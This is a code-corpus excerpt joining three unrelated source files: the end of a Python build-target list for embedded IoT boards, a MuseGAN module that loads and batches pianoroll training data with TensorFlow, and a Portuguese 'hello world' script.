    yield ameba_target.Extend('amebad-all-clusters', board=AmebaBoard.AMEBAD, app=AmebaApp.ALL_CLUSTERS)
    yield ameba_target.Extend('amebad-light', board=AmebaBoard.AMEBAD, app=AmebaApp.LIGHT)
    yield ameba_target.Extend('amebad-pigweed', board=AmebaBoard.AMEBAD, app=AmebaApp.PIGWEED)


def K32WTargets():
    target = Target('k32w', K32WBuilder)

    yield target.Extend('light-ota-se', app=K32WApp.LIGHT, release=True, disable_ble=True, se05x=True).GlobBlacklist("Only on demand build")
    yield target.Extend('light-release-no-ota', app=K32WApp.LIGHT, tokenizer=True, disable_ota=True, release=True)
    yield target.Extend('shell-release', app=K32WApp.SHELL, release=True)
    yield target.Extend('lock-release', app=K32WApp.LOCK, release=True)
    yield target.Extend('lock-low-power-release', app=K32WApp.LOCK,
                        low_power=True, release=True).GlobBlacklist("Only on demand build")


def cc13x2x7_26x2x7Targets():
    target = Target('cc13x2x7_26x2x7', cc13x2x7_26x2x7Builder)

    yield target.Extend('lock-ftd', app=cc13x2x7_26x2x7App.LOCK, openthread_ftd=True)
    yield target.Extend('lock-mtd', app=cc13x2x7_26x2x7App.LOCK, openthread_ftd=False)
    yield target.Extend('pump', app=cc13x2x7_26x2x7App.PUMP)
    yield target.Extend('pump-controller', app=cc13x2x7_26x2x7App.PUMP_CONTROLLER)
    yield target.Extend('all-clusters', app=cc13x2x7_26x2x7App.ALL_CLUSTERS)
    yield target.Extend('shell', app=cc13x2x7_26x2x7App.SHELL)


def Cyw30739Targets():
    yield Target('cyw30739-cyw930739m2evb_01-light', Cyw30739Builder,
                 board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.LIGHT)
    yield Target('cyw30739-cyw930739m2evb_01-lock', Cyw30739Builder,
                 board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.LOCK)
    yield Target('cyw30739-cyw930739m2evb_01-ota-requestor', Cyw30739Builder,
                 board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.OTA_REQUESTOR).GlobBlacklist(
                     "Running out of XIP flash space")
    yield Target('cyw30739-cyw930739m2evb_01-ota-requestor-no-progress-logging', Cyw30739Builder,
                 board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.OTA_REQUESTOR, progress_logging=False)


def QorvoTargets():
    target = Target('qpg', QpgBuilder)

    yield target.Extend('lock', board=QpgBoard.QPG6105, app=QpgApp.LOCK)
    yield target.Extend('light', board=QpgBoard.QPG6105, app=QpgApp.LIGHT)
    yield target.Extend('shell', board=QpgBoard.QPG6105, app=QpgApp.SHELL)
    yield target.Extend('persistent-storage', board=QpgBoard.QPG6105, app=QpgApp.PERSISTENT_STORAGE)


def TizenTargets():
    # Possible build variants.
    # NOTE: The number of potential builds is exponential here.
    builder = VariantBuilder()
    builder.AppendVariant(name="no-ble", enable_ble=False)
    builder.AppendVariant(name="no-wifi", enable_wifi=False)
    builder.AppendVariant(name="asan", use_asan=True)

    target = Target('tizen-arm', TizenBuilder, board=TizenBoard.ARM)
    builder.targets.append(target.Extend('light', app=TizenApp.LIGHT))

    for target in builder.AllVariants():
        yield target


def Bl602Targets():
    target = Target('bl602', Bl602Builder)

    yield target.Extend('light', board=Bl602Board.BL602BOARD, app=Bl602App.LIGHT)


def IMXTargets():
    target = Target('imx', IMXBuilder)

    yield target.Extend('chip-tool', app=IMXApp.CHIP_TOOL)
    yield target.Extend('lighting-app', app=IMXApp.LIGHT)
    yield target.Extend('thermostat', app=IMXApp.THERMOSTAT)
    yield target.Extend('all-clusters-app', app=IMXApp.ALL_CLUSTERS)
    yield target.Extend('ota-provider-app', app=IMXApp.OTA_PROVIDER)
    yield target.Extend('chip-tool-release', app=IMXApp.CHIP_TOOL, release=True)
    yield target.Extend('lighting-app-release', app=IMXApp.LIGHT, release=True)
    yield target.Extend('thermostat-release', app=IMXApp.THERMOSTAT, release=True)
    yield target.Extend('all-clusters-app-release', app=IMXApp.ALL_CLUSTERS, release=True)
    yield target.Extend('ota-provider-app-release', app=IMXApp.OTA_PROVIDER, release=True)


ALL = []

target_generators = [
    HostTargets(),
    Esp32Targets(),
    Efr32Targets(),
    NrfTargets(),
    AndroidTargets(),
    MbedTargets(),
    InfineonTargets(),
    AmebaTargets(),
    K32WTargets(),
    cc13x2x7_26x2x7Targets(),
    Cyw30739Targets(),
    QorvoTargets(),
    TizenTargets(),
    Bl602Targets(),
    IMXTargets(),
]

for generator in target_generators:
    for target in generator:
        ALL.append(target)

# Simple targets added one by one
ALL.append(Target('telink-tlsr9518adk80d-light', TelinkBuilder,
                  board=TelinkBoard.TLSR9518ADK80D, app=TelinkApp.LIGHT))
ALL.append(Target('telink-tlsr9518adk80d-light-switch', TelinkBuilder,
                  board=TelinkBoard.TLSR9518ADK80D, app=TelinkApp.SWITCH))

# have a consistent order overall
ALL.sort(key=lambda t: t.name)
| 1.234375 | 1 |
src/musegan/data.py | TRINITRONIC/musegan | 0 | 1298 | """This file contains functions for loading and preprocessing pianoroll data.
"""
import logging
import numpy as np
import tensorflow.compat.v1 as tf
from musegan.config import SHUFFLE_BUFFER_SIZE, PREFETCH_SIZE
LOGGER = logging.getLogger(__name__)
# --- Data loader --------------------------------------------------------------
def load_data_from_npy(filename):
    """Load and return the training data from an npy file."""
    return np.load(filename)


def load_data_from_npz(filename):
    """Load and return the training data from an npz file (sparse format)."""
    with np.load(filename) as f:
        data = np.zeros(f['shape'], np.bool_)
        data[[x for x in f['nonzero']]] = True
    return data
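

# Added sketch (not part of the original module): one way to write an .npz file
# in the sparse layout that `load_data_from_npz` expects -- a `shape` array plus
# a `nonzero` array holding the per-axis indices of the True entries. The file
# name used here is only an illustrative assumption.
def _example_save_data_to_npz(data, filename='train_x_sparse.npz'):
    """Save a boolean pianoroll array in the sparse npz format loaded above."""
    np.savez_compressed(
        filename,
        shape=np.array(data.shape),
        nonzero=np.array(data.nonzero()))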


def load_data(data_source, data_filename):
    """Load and return the training data."""
    if data_source == 'sa':
        import SharedArray as sa
        return sa.attach(data_filename)
    if data_source == 'npy':
        return load_data_from_npy(data_filename)
    if data_source == 'npz':
        return load_data_from_npz(data_filename)
    raise ValueError("Expect `data_source` to be one of 'sa', 'npy', 'npz'. "
                     "But get " + str(data_source))
# --- Dataset Utilities -------------------------------------------------------
def random_transpose(pianoroll):
    """Randomly transpose a pianoroll by a shift drawn uniformly from
    [-5, 5] semitones."""
    semitone = np.random.randint(-5, 6)
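    # Added note (assumption): the pianoroll is taken to be shaped
    # (time, pitch, track), so the shifts below move the pitch axis; the `1:`
    # slice on the last axis leaves the first track untouched -- presumably the
    # drum track, which should not be pitch-shifted.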
    if semitone > 0:
        pianoroll[:, semitone:, 1:] = pianoroll[:, :-semitone, 1:]
        pianoroll[:, :semitone, 1:] = 0
    elif semitone < 0:
        pianoroll[:, :semitone, 1:] = pianoroll[:, -semitone:, 1:]
        pianoroll[:, semitone:, 1:] = 0
    return pianoroll


def set_pianoroll_shape(pianoroll, data_shape):
    """Set the pianoroll shape and return the pianoroll."""
    pianoroll.set_shape(data_shape)
    return pianoroll


def set_label_shape(label):
    """Set the label shape and return the label."""
    label.set_shape([1])
    return label
# --- Sampler ------------------------------------------------------------------
def get_samples(n_samples, data, labels=None, use_random_transpose=False):
    """Return some random samples of the training data."""
    indices = np.random.choice(len(data), n_samples, False)
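    # Added note (assumption): boolean pianorolls are rescaled from {0, 1} to
    # {-1, 1} below, presumably to match the tanh output range of the generator.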
    if np.issubdtype(data.dtype, np.bool_):
        sample_data = data[indices] * 2. - 1.
    else:
        sample_data = data[indices]
    if use_random_transpose:
        sample_data = np.array([random_transpose(x) for x in sample_data])
    if labels is None:
        return sample_data
    return sample_data, labels[indices]
# --- Tensorflow Dataset -------------------------------------------------------
def _gen_data(data, labels=None):
    """Data Generator."""
    if labels is None:
        for item in data:
            if np.issubdtype(data.dtype, np.bool_):
                yield item * 2. - 1.
            else:
                yield item
    else:
        for i, item in enumerate(data):
            if np.issubdtype(data.dtype, np.bool_):
                yield (item * 2. - 1., labels[i])
            else:
                yield (item, labels[i])


def get_dataset(data, labels=None, batch_size=None, data_shape=None,
                use_random_transpose=False, num_threads=1):
    """Create and return a tensorflow dataset from an array."""
    if labels is None:
        dataset = tf.data.Dataset.from_generator(
            lambda: _gen_data(data), tf.float32)
        if use_random_transpose:
            dataset = dataset.map(
                lambda pianoroll: tf.py_func(
                    random_transpose, [pianoroll], tf.float32),
                num_parallel_calls=num_threads)
        dataset = dataset.map(lambda pianoroll: set_pianoroll_shape(
            pianoroll, data_shape), num_parallel_calls=num_threads)
    else:
        assert len(data) == len(labels), (
            "Lengths of `data` and `labels` do not match.")
        dataset = tf.data.Dataset.from_generator(
            lambda: _gen_data(data, labels), [tf.float32, tf.int32])
        if use_random_transpose:
            dataset = dataset.map(
                lambda pianoroll, label: (
                    tf.py_func(random_transpose, [pianoroll], tf.float32),
                    label),
                num_parallel_calls=num_threads)
        dataset = dataset.map(
            lambda pianoroll, label: (set_pianoroll_shape(
                pianoroll, data_shape), set_label_shape(label)),
            num_parallel_calls=num_threads)
    dataset = dataset.shuffle(SHUFFLE_BUFFER_SIZE).repeat().batch(batch_size)
    return dataset.prefetch(PREFETCH_SIZE)
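

# Added usage sketch (not part of the original module; the file name, batch size
# and thread count are assumptions): wire `load_data` and `get_dataset` together
# and pull batches through a TF1-style one-shot iterator, matching the
# tensorflow.compat.v1 API imported above.
def _example_input_pipeline():
    """Illustrative only: build an input pipeline from a training array."""
    train_x = load_data('npz', 'train_x.npz')  # hypothetical file
    dataset = get_dataset(
        train_x, batch_size=64, data_shape=train_x.shape[1:],
        use_random_transpose=True, num_threads=4)
    iterator = tf.data.make_one_shot_iterator(dataset)
    return iterator.get_next()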
| 2.859375 | 3 |
Python/hello-world-pt-BR.py | PushpneetSingh/Hello-world | 1,428 | 1299 | print(u"Olá Mundo!") | 1.390625 | 1 |